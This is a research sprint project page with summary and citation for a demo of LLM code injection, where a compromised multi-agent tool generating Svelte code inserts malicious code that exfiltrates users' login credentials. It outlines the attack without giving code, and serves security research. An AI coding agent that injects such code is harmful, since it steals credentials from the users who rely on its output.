Aug 27, 2024

Demonstrating LLM Code Injection Via Compromised Agent Tool

Kevin Vegda, Oliver Chamberlain, William Baird

Details

Details

Arrow
Arrow
Arrow

Summary

This project demonstrates the vulnerability of AI-generated code to injection attacks by using a compromised multi-agent tool that generates Svelte code. The tool shows how malicious code can be injected during the code generation process, leading to the exfiltration of sensitive user information such as login credentials. This demo highlights the importance of robust security measures in AI-assisted development environments.

Cite this work:

@misc {

title={

Demonstrating LLM Code Injection Via Compromised Agent Tool

},

author={

Kevin Vegda, Oliver Chamberlain, William Baird

},

date={

8/27/24

},

organization={Apart Research},

note={Research submission to the research sprint hosted by Apart.},

howpublished={https://apartresearch.com}

}

Review

Review

Arrow
Arrow
Arrow

Reviewer's Comments

Reviewer's Comments

Arrow
Arrow
Arrow

No reviews are available yet

This work was done during one weekend by research workshop participants and does not represent the work of Apart Research.
This work was done during one weekend by research workshop participants and does not represent the work of Apart Research.